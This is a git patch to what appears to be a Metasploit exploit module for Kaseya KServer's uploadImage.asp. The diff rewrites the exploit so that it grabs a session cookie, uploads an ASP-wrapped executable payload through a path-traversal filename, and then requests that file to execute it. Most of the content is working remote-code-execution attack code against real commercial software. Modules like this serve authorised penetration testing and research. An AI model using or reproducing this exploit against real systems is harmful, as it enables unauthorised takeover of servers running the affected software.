From 60a245b0c37d529bc3f1cf7b96d21fff08ddbb1d Mon Sep 17 00:00:00 2001 From: Thomas Hibbert Date: Mon, 18 Nov 2013 14:49:03 +1300 Subject: [PATCH] Fix the arch declaration in uploaded module. --- .../http/kaseya_uploadimage_file_upload.rb | 62 ++++++++++++------- 1 file changed, 41 insertions(+), 21 deletions(-) mode change 100644 => 100755 modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb old mode 100644 new mode 100755 index 825c24827e..11fd17e77b --- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb +++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb @@ -24,7 +24,7 @@ Code executed in this manner runs under the IUSR account. }, 'Author' => [ - 'Thomas Hibbert' # thomas.hibbert@security-assessment.com + 'Thomas Hibbert' # cartel ], 'License' => MSF_LICENSE, 'References' => @@ -35,7 +35,7 @@ Code executed in this manner runs under the IUSR account. 'BadChars' => "\x00", }, 'Platform' => 'win', - 'Arch' => ARCH_x86, + 'Arch' => ARCH_X86, 'Targets' => [ [ 'Kaseya KServer / Windows', {} ], @@ -62,6 +62,21 @@ Code executed in this manner runs under the IUSR account. return Exploit::CheckCode::Appears end + def get_cookie + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri("SystemTab", "uploadImage.asp") + }) + + if res and res.headers['Set-Cookie'] + cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0] + else + fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue") + end + + cookie + end + def exploit peer = "#{rhost}:#{rport}" @@ -69,25 +84,30 @@ Code executed in this manner runs under the IUSR account. exe = generate_payload_exe asp = Msf::Util::EXE.to_exe_asp(exe) - data = Rex::MIME::Message.new - data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"#{payload_name}\"") + post_data = Rex::MIME::Message.new + post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"..\\#{@payload_name}\"") - res = send_request_raw({ - 'method' => 'POST', - 'uri' => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\#{payload_name}'), - 'data' => data, - 'headers' => { - 'ctype' => 'multipart/form-data; boundary=#{data.bound}' - } - }) - if not res or res.code != 200 - fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") - end - print_status("#{peer} - Executing payload #{@payload_name}") - res = send_request_raw({ - 'uri' => normalize_uri(@payload_name), - 'method' => 'GET' - }) + data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + cookie = get_cookie + res = send_request_raw({ + 'method' => 'POST', + 'uri' => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\..\\'+@payload_name), + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'cookie' => cookie + }) + + if not res or res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") + end + + print_status("#{peer} - Executing payload #{@payload_name}") + res = send_request_cgi({ + 'uri' => normalize_uri(@payload_name), + 'method' => 'GET' + }) end -end + end +